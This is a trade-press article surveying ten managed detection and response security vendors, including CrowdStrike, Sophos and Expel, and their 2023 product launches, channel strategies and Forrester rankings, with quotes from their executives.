10 MDR Security Companies Making Moves In 2023 (So Far)

These MDR (managed detection and response) providers have been expanding their security offerings into new areas and doubling down on working with channel partners.

Latest Moves On MDR

With cybersecurity talent hard to come by and threats continuing to intensify, demand for managed security has boomed. A growing number of organizations are choosing a managed detection and response (MDR) platform to meet some or all of their needs for outside assistance on security, leading to surging growth for MDR security companies. And many of these MDR service providers have been making big moves in 2023, including through expanding their security offerings into new areas — including managed XDR (extended detection and response) — and doubling down on working with channel partners.

While the MDR field has gotten crowded with dozens of players now in the market, analysts at research firm Forrester have pinpointed some of the MDR security companies they view as at the head of the pack, in their just-released Forrester Wave ranking for managed detection and response vendors (for Q2 2023). The three MDR “Leaders” identified by Forrester are CrowdStrike, Expel and Red Canary. Meanwhile, cybersecurity giant CrowdStrike disclosed this week that its MDR market share, according to Gartner figures, has remained the largest in the segment for the second year in a row.

Other major security companies that are heavily focused on MDR services — and that appeared in the Forrester ranking as “Strong Performers” — include SentinelOne, Arctic Wolf and Secureworks. There have also been new entrants into the MDR security company market that are making big moves. Since last summer, Palo Alto Networks has been counting itself among those, with its Unit 42 division offering an MDR service powered by the vendor’s Cortex XDR platform.

While MDR is sometimes conflated with full security operations center (SOC) coverage in the market, the two are not identical, noted Eron Howard, COO at Novacoast, a large Wichita, Kan.-based MSSP. MDR generally has a more-limited scope than what a comprehensive SOC service would provide, for instance. However, many resellers have “gravitated towards MDR services” since they scale well and are relatively easy to operate, Howard said. Core criteria for MDR, according to Gartner, is that it provides a human-led, remotely delivered service that includes around-the-clock detection, analysis, investigation and response to threats.

In terms of MDR’s growth, according to the latest figures available from Gartner, the MDR market ballooned by 48.9 percent in 2021. By 2025, the research firm has predicted that the portion of organizations using MDR services will rise to 60 percent, doubling the percentage from earlier this year.

What follows are the key details on 10 MDR security companies that have been making moves in 2023 so far.

CrowdStrike

In April, MDR market share leader CrowdStrike disclosed where it’s going next: Managed XDR (extended detection and response). The cybersecurity giant unveiled Falcon Complete XDR, a new managed XDR offering that aims to make the technology applicable to more customers and partners than it has been to date. The offering follows the model of CrowdStrike’s MDR service — which focuses on detecting threats on endpoint devices — and brings the managed model to the full range of tools and environments that are analyzed and correlated in the vendor’s XDR engine.

CrowdStrike’s managed XDR offering also integrates tools from vendors in key segments such as security service edge, identity security, email security, firewalls and network detection and response. And like with CrowdStrike’s MDR offering, its managed XDR service provides 24/7 management.

In addition, Falcon Complete XDR also includes threat hunting, monitoring and remediation, CrowdStrike said.

Ultimately, as EDR was getting established, MDR helped many organizations to adopt the advanced endpoint security capabilities, noted CrowdStrike’s chief business officer, Daniel Bernard (pictured). “And likewise, managed XDR becomes an offering that’s really compelling for organizations looking to get into XDR or get the full value out of XDR,” Bernard told CRN.

Secureworks

As Secureworks continues its transition from an MSSP to a vendor focused on XDR and MDR, the company has made a number of recent notable enhancements to its Taegis platform. In March, the company announced the debut of its Taegis Security Posture Dashboard, which aims to provide customers and partners with a comprehensive, user-friendly interface to monitor and evaluate their security posture. Key features include an event pipeline, which gives a quick view of how security events are being handled; an “alerts per endpoint” feature to show how much activity is related to certain endpoints, and how that compares to the rest of the industry; and “investigation response,” which provides an assessment of the speed and effectiveness of investigations. The Security Posture Dashboard is free for all Taegis partners and customers, including those leveraging the Secureworks MDR service, Taegis ManagedXDR.

Meanwhile, also in March, Secureworks announced expanded support for Google Cloud as well as for Google Workspace applications. The expansion enables organizations to improve alert visibility and traceability, while accelerating investigation times, according to the company.

In an interview with CRN in April, Secureworks President and CEO Wendy Thomas (pictured) said that the company is “building relationships with different partners so customers have the best security options possible in the space. [We want to] integrate in a way that customers gain bidirectional benefit — where both products get better — so that a customer of both is better off from a security perspective.”

The company was named a “Strong Performer” in the latest Forrester Wave ranking for MDR.

Arctic Wolf

While Arctic Wolf’s first foray into the market was around managed detection and response, the company has been busy expanding well beyond MDR as it seeks to help solve multiple security problems and address multiple attack surfaces, said Nick Schneider, president and CEO of Arctic Wolf, in a recent interview with CRN. “Where our story really evolves is that we’re not only doing detection and response, and doing detection or response against multiple attack surfaces — but we’re adding to that same platform capabilities on vulnerability management, capabilities on awareness training, capabilities with regards to incident response and mechanisms for customers to understand their overall security posture,” Schneider said.

Among Arctic Wolf’s major recent moves was its launch of a retainer option for its cyber incident response services, which aims to allow partners to more easily supply their customers with rapid access to the services. The Arctic Wolf Incident Response JumpStart Retainer features benefits such as a guarantee that cyber incidents will receive a response within one hour, backed by a service-level agreement.

“I think detection and response is resonating with customers. But I think what customers are looking for, more than specifically detection and response, is a security partner that can help them to solve more than one problem, and can look at more than one attack surface,” Schneider told CRN. “Most of the customers we talk to are completely fed up with the number of tools that they’ve been asked to buy, or the number of tools that they’ve been told they need to deploy within their environment to understand their security posture. Most customers just want to know, ‘Am I protected or am I not protected?’”

The company was named a “Strong Performer” in the latest Forrester Wave ranking for MDR.

SentinelOne

Through its Singularity XDR platform, SentinelOne promises “full MDR capabilities” — including response, remediation and threat hunting. The company also offers its own 24/7 MDR service, SentinelOne Vigilance Respond.

In February, SentinelOne expanded its set of industry collaborations around MDR with the release of N-able’s new Managed EDR service. The N-able Managed Endpoint Detection and Response service is powered by SentinelOne Vigilance Respond, the companies disclosed.

Meanwhile, major recent enhancements to Singularity XDR include the unveiling in April of a new threat hunting tool, dubbed Purple AI, which is the first in a series of planned products from the company that will be powered by generative AI. “I think for us, it’s a whole new way to reimagine cybersecurity,” SentinelOne co-founder and CEO Tomer Weingarten (pictured) said during a recent interview with CRN. “What it can do — even today in the limited preview that we put out there — is astounding. It takes any entry-level analyst and makes them a ‘super analyst.’ … You can traverse through more data with more speed with more accuracy.”

The company was named a “Strong Performer” in the latest Forrester Wave ranking for MDR.

Sophos

For cybersecurity industry stalwart Sophos, the shift to delivering cybersecurity via an as-a-service model is a top priority for investment going forward — starting with the company’s MDR service. In April, Sophos disclosed that its MDR customer base grew by 33 percent over the prior six months, to a total of more than 16,000 customers. “We have more MDR customers than any other vendor that we’re aware of,” Sophos CEO Kris Hagerman (pictured) said in a recent interview with CRN.

In March, Sophos disclosed a suite of new endpoint security capabilities that feed into the MDR service — as well as the underlying XDR platform that helps to power the MDR. The updates include new account health check capabilities, through which Sophos can inform endpoint customers if something appears off-base with their configuration. Another recently introduced capability is “adaptive active adversary protection, which puts Sophos’ endpoint security product into what the company calls “breach mode” when it appears that a customer is under attack. The product can then prevent an executable from running, for instance, or can prohibit a connection to a particular endpoint — disrupting attacks that are in progress.

MDR, however, is just the start of the vendor’s foray into the as-a-service arena. Sophos is “now moving to the next phase, which is to take what we deliver in MDR and make that available in our products,” Hagerman said. The ultimate goal is to take all of the products in the Sophos portfolio—including in endpoint, network, cloud and email security—and “deliver them as a service—and do it in a way that’s highly flexible for both customers and for our channel partners,” he said.

Palo Alto Networks

In August 2022, Palo Alto Networks’ Unit 42 division launched the company’s first-ever MDR service, built on the vendor’s Cortex XDR platform. The Unit 42 MDR service leverages the division’s well-regarded threat intelligence service, which goes a long way toward making the company’s MDR service “uniquely positioned” to improve customer security, said Wendi Whitmore (pictured), senior vice president at Unit 42, in an interview at the time.

In April, Palo Alto Networks took the next step in advancing its MDR service with the global expansion of the Unit 42 Digital Forensics and Incident Response (DFIR) Service, which includes 24/7 managed detection and response among its core offerings. In addition to MDR, the DFIR service consists of a variety of assessments as well as incident response preparedness, incident response and managed threat hunting.

Expel

Expel, which was named among the three leaders in the latest Forrester Wave ranking for MDR, has continued to expand its platform with a number of recent updates. In February, the company announced general availability of its MDR service for Kubernetes environments, which Expel called “the first-to-market offering of its kind.” This new offering “enables customers to secure their business across their Kubernetes environment and adopt new technologies at scale without being hindered by security concerns,” Expel said in a news release.

Then in April, Expel debuted a new product focused on helping security teams to determine where to focus first on tackling the highest-risk vulnerabilities. The product, Expel Vulnerability Prioritization, “empowers security teams to understand their most urgent risk areas within their detection and response workflows for seamless investigation and remediation,” the company said in a release. Ultimately, the tool “eliminates the need for teams to spend hours investigating vulnerabilities,” Expel said.

eSentire

Named a “Strong Performer” in the latest Forrester Wave ranking for MDR, eSentire’s latest moves have continued the evolution of the company from an MSSP into an MDR platform vendor with the help of partners. In May 2022, eSentire revamped its partner program and relaunched it under the name e3, with a focus on meeting the needs of MSPs and MSSPs as well as VARs and master agents.

The new program has helped enable eSentire to generate an increasing percentage of its business through the channel, according to Bob Layton (pictured), the company’s chief channel officer. Two years ago, less than 30 percent of eSentire’s business derived from the channel. But as of this year, “we will have more than 70 percent of our business going through the channel,” Layton told CRN recently.

In many cases now, when it comes to MSP or MSSP firms that are delivering services to customers, “it’s eSentire under the hood,” he said. “The MSP is saying, it’s too expensive and time-consuming for me to try to build this myself.”

ReliaQuest

With its GreyMatter platform, ReliaQuest says it brings together technology and services to “deliver MDR outcomes” — increasingly, with the help of the channel. In February, ReliaQuest announced its commitment to include partners on all new deals as it seeks to accelerate the growth of GreyMatter.

The company’s GreyMatter security operations platform features an “open” XDR architecture — meaning it can be used to analyze data feeds from third-party tools, allowing customers to leverage their existing security products. The approach has caught on with partners, which already were involved with 70 percent of new ReliaQuest deals in the fourth quarter of 2022, according to Colin O’Connor (pictured), COO of ReliaQuest.

“From a VAR perspective, what’s really unique is that they’re not having to go in and explain why ReliaQuest is going to replace [tools] that they’ve sold them or put in their environment in the past,” O’Connor told CRN. “Instead they’re saying, ‘Hey, ReliaQuest and the GreyMatter solution actually can help you to maximize the investments you’ve made in tools like CrowdStrike or Splunk or SentinelOne, or your Palo Alto [Networks] stack, or Microsoft stack or whatever it is.”

ReliaQuest was named a “Contender” in the latest Forrester Wave ranking for MDR.

Critical Start

Calling its platform the “most efficient” MDR platform available, Critical Start leverages a registry “trusted behaviors” that enables automation of the resolution for 99 percent of security alerts. “Where most other platforms require a user to make a final decision of ‘OK, this is known good based on this investigation that was automatically done’ — we’re saying, ‘We know this is good, so we’re just going to safely resolve it,’” said Randy Watkins (pictured), CTO at Critical Start, in a recent interview with CRN. “And doing that, it allows us to scale — and resolve 100 percent of alerts regardless of the criticality assigned from the organization.”

Recent updates for Critical Start’s MDR platform have included additional SIEM (security information and event management) support in its Security Services for SIEM offering. The expansion has come through support for Sumo Logic’s SIEM technology, aimed at enabling faster and more effective responses to threats for Sumo Logic customers.

Ultimately for Critical Start, “with our methodology, what we’re able to do is resolve every single alert — whether it’s critical, high, medium or low — because we’re looking at the individual alerts,” Watkins said. “We’re not waiting until it bubbles up to an incident and then trying to pick apart that incident.”